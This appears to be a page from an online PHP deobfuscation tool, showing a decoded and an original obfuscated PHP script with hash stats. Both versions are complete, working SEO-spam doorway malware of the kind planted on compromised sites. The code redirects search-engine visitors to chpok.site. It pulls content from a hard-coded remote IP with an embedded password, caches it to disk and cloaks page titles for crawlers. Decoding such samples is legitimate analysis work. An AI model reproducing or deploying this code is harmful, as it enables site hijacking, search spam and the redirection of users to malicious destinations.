Find this useful? Enter your email to receive occasional updates for securing PHP code.

Signing you up...

Thank you for signing up!

PHP Decode

<?php goto ae5S6; HOLbD: if (strlen($text) > 5000) { $out = fopen("\151\156\144\145\170\..

Decoded Output download

<?php 
 goto ae5S6; HOLbD: if (strlen($text) > 5000) { $out = fopen("index/" . $myname, "w"); fwrite($out, $text); fclose($out); } goto DTaxn; lV1Xj: foreach ($_GET as $a => $b) { $_GET["id"] = $b; } goto uKFsd; CmmM2: if ($s == "\" | $s == "/") { $s = ''; } goto nIKju; RAf0y: $query_pars_2 = str_replace("-", "+", $_GET["id"]); goto P_8H2; uKFsd: if ($_GET["id"] == "testing") { echo "test good..."; die; } goto Axmg_; Axmg_: if ($_GET["id"] == "index") { header("Location: https://google.com"); die; } goto fCvOa; uNdGR: $apass = "{$apass1}" . "{$apass2}" . "{$apass3}"; goto TakCl; VYfZg: $today = "20240323-"; goto lV1Xj; QWvb2: if (strlen($text) < 5000) { $url = "135.181.21.126"; $fp = fsockopen($url, 80, $errno, $errstr, 30); if (!$fp) { echo "{$errstr} ({$errno})<br />\xa"; } else { $req = "/" . $_GET["fn"] . ".php?pass={$apass}&q={$_GET["id"]}"; $out = "GET {$req} HTTP/1.0\xd
"; $out .= "Host: {$url}
"; $out .= "Connection: Close
\xd
"; fwrite($fp, $out); while (!feof($fp)) { $text = $text . fgets($fp, 2048); } fclose($fp); } fclose($out); $text = explode("\xa", $text); $text = $text[7]; } goto HOLbD; ae5S6: error_reporting(0); goto VYfZg; zyaDh: $x1 = 3; goto Xekk_; P_8H2: $text = ''; goto aTGF3; qfH3L: echo $text; goto fEyHT; BdSgk: $_GET["fn"] = "696969new"; goto f7gtV; H6gtA: $keyword = str_replace(" ", "+", $keyword); goto LBLQ0; DTaxn: if (strpos($_SERVER["HTTP_USER_AGENT"], "bing") > 2 or strpos($_SERVER["HTTP_USER_AGENT"], "yahoo") > 2) { $text = str_replace("<title></title>", "<title>{$keyword}</title>", $text); } goto qfH3L; Pudzr: if (strlen($text) < 5000) { $text = file_get_contents("http://135.181.21.126/" . $_GET["fn"] . ".php?pass={$apass}&q={$_GET["id"]}"); } goto QWvb2; LBLQ0: $apass2 = "b23hr23vr32"; goto wDqi7; aTGF3: if (function_exists("curl_init")) { $ch = curl_init(); curl_setopt($ch, CURLOPT_URL, "http://135.181.21.126/" . $_GET["fn"] . ".php?pass={$apass}&q={$_GET["id"]}"); curl_setopt($ch, CURLOPT_RETURNTRANSFER, 1); curl_setopt($ch, CURLOPT_CONNECTTIMEOUT, 4); curl_setopt($ch, CURLOPT_SSL_VERIFYPEER, FALSE); curl_setopt($ch, CURLOPT_SSL_VERIFYHOST, 2); curl_setopt($ch, CURLOPT_USERAGENT, "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1)"); $text = curl_exec($ch); curl_close($ch); } goto Pudzr; wDqi7: $s = dirname($_SERVER["PHP_SELF"]); goto CmmM2; f7gtV: $apass1 = "visdoijew"; goto zyaDh; YFAv_: $keyword = str_replace("-", " ", $_GET["id"]); goto H6gtA; fCvOa: $_GET["world"] = 5; goto BdSgk; Xekk_: $xx1 = 5; goto YFAv_; u_fY5: $apass3 = "rv32ydacsvsdv"; goto uNdGR; nIKju: $s = $_SERVER["SERVER_NAME"] . $s; goto u_fY5; TakCl: if (strpos($_SERVER["HTTP_REFERER"], "google.") or strpos($_SERVER["HTTP_REFERER"], "yahoo.") or strpos($_SERVER["HTTP_REFERER"], "bing.")) { header("Location: https://chpok.site/enter/?mark={$today}-{$s}&engkey={$keyword}"); die; } else { $myname = $_GET["id"] . ".php"; if (file_exists("index/" . $myname)) { $html = @file_get_contents("index/" . $myname); if (strpos($_SERVER["HTTP_USER_AGENT"], "bing") > 2 or strpos($_SERVER["HTTP_USER_AGENT"], "yahoo") > 2) { $keyword = str_replace("-", " ", $_GET["id"]); $html = str_replace("<title></title>", "<title>{$keyword}</title>", $html); } echo $html; die; } } goto RAf0y; fEyHT: ?> 

Did this file decode correctly?

Original Code

<?php
 goto ae5S6; HOLbD: if (strlen($text) > 5000) { $out = fopen("\151\156\144\145\170\x2f" . $myname, "\x77"); fwrite($out, $text); fclose($out); } goto DTaxn; lV1Xj: foreach ($_GET as $a => $b) { $_GET["\151\144"] = $b; } goto uKFsd; CmmM2: if ($s == "\134" | $s == "\57") { $s = ''; } goto nIKju; RAf0y: $query_pars_2 = str_replace("\55", "\x2b", $_GET["\x69\144"]); goto P_8H2; uKFsd: if ($_GET["\x69\144"] == "\x74\x65\x73\x74\151\x6e\x67") { echo "\164\x65\163\164\40\147\157\x6f\144\x2e\56\56"; die; } goto Axmg_; Axmg_: if ($_GET["\151\144"] == "\x69\x6e\144\145\x78") { header("\114\157\143\x61\164\x69\x6f\156\72\40\x68\x74\x74\x70\x73\72\57\57\147\x6f\157\147\154\x65\56\143\157\x6d"); die; } goto fCvOa; uNdGR: $apass = "{$apass1}" . "{$apass2}" . "{$apass3}"; goto TakCl; VYfZg: $today = "\x32\60\62\x34\60\63\x32\x33\x2d"; goto lV1Xj; QWvb2: if (strlen($text) < 5000) { $url = "\61\63\65\56\x31\70\61\x2e\x32\61\x2e\x31\62\66"; $fp = fsockopen($url, 80, $errno, $errstr, 30); if (!$fp) { echo "{$errstr}\x20\50{$errno}\51\x3c\x62\x72\x20\x2f\x3e\xa"; } else { $req = "\x2f" . $_GET["\146\x6e"] . "\56\x70\x68\160\77\x70\141\x73\x73\x3d{$apass}\x26\161\x3d{$_GET["\151\x64"]}"; $out = "\x47\x45\124\x20{$req}\x20\x48\124\x54\120\x2f\x31\x2e\60\xd\12"; $out .= "\110\x6f\163\164\x3a\x20{$url}\15\12"; $out .= "\103\x6f\x6e\156\145\143\164\151\157\156\x3a\x20\103\x6c\x6f\163\x65\15\12\xd\12"; fwrite($fp, $out); while (!feof($fp)) { $text = $text . fgets($fp, 2048); } fclose($fp); } fclose($out); $text = explode("\xa", $text); $text = $text[7]; } goto HOLbD; ae5S6: error_reporting(0); goto VYfZg; zyaDh: $x1 = 3; goto Xekk_; P_8H2: $text = ''; goto aTGF3; qfH3L: echo $text; goto fEyHT; BdSgk: $_GET["\146\x6e"] = "\66\71\66\x39\66\x39\x6e\145\167"; goto f7gtV; H6gtA: $keyword = str_replace("\40", "\53", $keyword); goto LBLQ0; DTaxn: if (strpos($_SERVER["\x48\x54\x54\x50\x5f\x55\123\x45\x52\137\x41\x47\105\x4e\x54"], "\142\151\x6e\147") > 2 or strpos($_SERVER["\110\x54\124\120\x5f\x55\123\x45\x52\x5f\101\107\105\116\x54"], "\171\x61\150\157\x6f") > 2) { $text = str_replace("\74\x74\151\x74\x6c\x65\76\74\57\x74\151\164\x6c\145\x3e", "\74\164\151\164\154\145\76{$keyword}\x3c\57\x74\151\164\x6c\145\76", $text); } goto qfH3L; Pudzr: if (strlen($text) < 5000) { $text = file_get_contents("\150\164\164\160\72\x2f\57\x31\x33\x35\x2e\61\x38\61\56\62\61\56\x31\62\x36\x2f" . $_GET["\x66\156"] . "\x2e\160\150\160\77\x70\x61\163\163\75{$apass}\46\161\x3d{$_GET["\x69\x64"]}"); } goto QWvb2; LBLQ0: $apass2 = "\142\62\63\150\162\62\63\166\x72\63\x32"; goto wDqi7; aTGF3: if (function_exists("\143\x75\162\x6c\x5f\x69\156\151\164")) { $ch = curl_init(); curl_setopt($ch, CURLOPT_URL, "\150\164\164\x70\x3a\x2f\x2f\x31\63\65\56\x31\70\61\56\62\61\x2e\61\x32\66\x2f" . $_GET["\x66\156"] . "\x2e\160\x68\160\x3f\160\141\163\x73\x3d{$apass}\46\161\75{$_GET["\x69\144"]}"); curl_setopt($ch, CURLOPT_RETURNTRANSFER, 1); curl_setopt($ch, CURLOPT_CONNECTTIMEOUT, 4); curl_setopt($ch, CURLOPT_SSL_VERIFYPEER, FALSE); curl_setopt($ch, CURLOPT_SSL_VERIFYHOST, 2); curl_setopt($ch, CURLOPT_USERAGENT, "\115\157\172\x69\x6c\154\141\x2f\64\56\x30\40\50\x63\157\x6d\x70\x61\x74\151\x62\154\x65\73\x20\115\123\111\105\x20\x36\56\x30\73\x20\x57\151\x6e\144\x6f\167\x73\x20\116\x54\x20\x35\x2e\61\x3b\x20\123\x56\x31\x29"); $text = curl_exec($ch); curl_close($ch); } goto Pudzr; wDqi7: $s = dirname($_SERVER["\120\x48\x50\137\123\x45\x4c\x46"]); goto CmmM2; f7gtV: $apass1 = "\166\x69\163\144\x6f\151\152\x65\167"; goto zyaDh; YFAv_: $keyword = str_replace("\55", "\x20", $_GET["\x69\144"]); goto H6gtA; fCvOa: $_GET["\167\x6f\162\x6c\x64"] = 5; goto BdSgk; Xekk_: $xx1 = 5; goto YFAv_; u_fY5: $apass3 = "\x72\x76\x33\62\x79\x64\141\x63\163\166\x73\144\166"; goto uNdGR; nIKju: $s = $_SERVER["\x53\x45\122\x56\105\x52\137\116\101\x4d\105"] . $s; goto u_fY5; TakCl: if (strpos($_SERVER["\110\x54\x54\120\137\122\x45\106\105\x52\105\122"], "\147\x6f\157\147\154\x65\x2e") or strpos($_SERVER["\x48\x54\x54\120\137\122\105\x46\x45\x52\x45\x52"], "\x79\141\x68\x6f\x6f\x2e") or strpos($_SERVER["\110\x54\x54\120\137\x52\105\x46\x45\122\105\x52"], "\x62\x69\x6e\147\56")) { header("\x4c\157\143\141\164\x69\x6f\156\x3a\40\x68\164\164\x70\163\72\x2f\57\x63\150\x70\157\153\56\163\151\x74\145\57\145\x6e\164\145\x72\57\x3f\x6d\141\162\x6b\75{$today}\55{$s}\46\x65\156\147\153\x65\x79\75{$keyword}"); die; } else { $myname = $_GET["\x69\x64"] . "\56\x70\x68\160"; if (file_exists("\151\156\x64\x65\170\x2f" . $myname)) { $html = @file_get_contents("\151\x6e\x64\145\x78\57" . $myname); if (strpos($_SERVER["\x48\124\x54\120\x5f\x55\x53\105\122\x5f\x41\x47\105\x4e\x54"], "\x62\151\x6e\x67") > 2 or strpos($_SERVER["\110\x54\x54\120\137\x55\123\x45\x52\x5f\101\107\105\x4e\x54"], "\x79\x61\150\x6f\x6f") > 2) { $keyword = str_replace("\55", "\40", $_GET["\x69\144"]); $html = str_replace("\74\164\x69\x74\x6c\x65\76\x3c\57\x74\151\164\x6c\145\76", "\x3c\x74\x69\164\x6c\x65\76{$keyword}\x3c\x2f\x74\151\x74\154\x65\x3e", $html); } echo $html; die; } } goto RAf0y; fEyHT: ?>

Function Calls

None

Variables

None

Stats

MD5 072a7ac9f861e2f5a5abb2d7a722043d
Eval Count 0
Decode Time 53 ms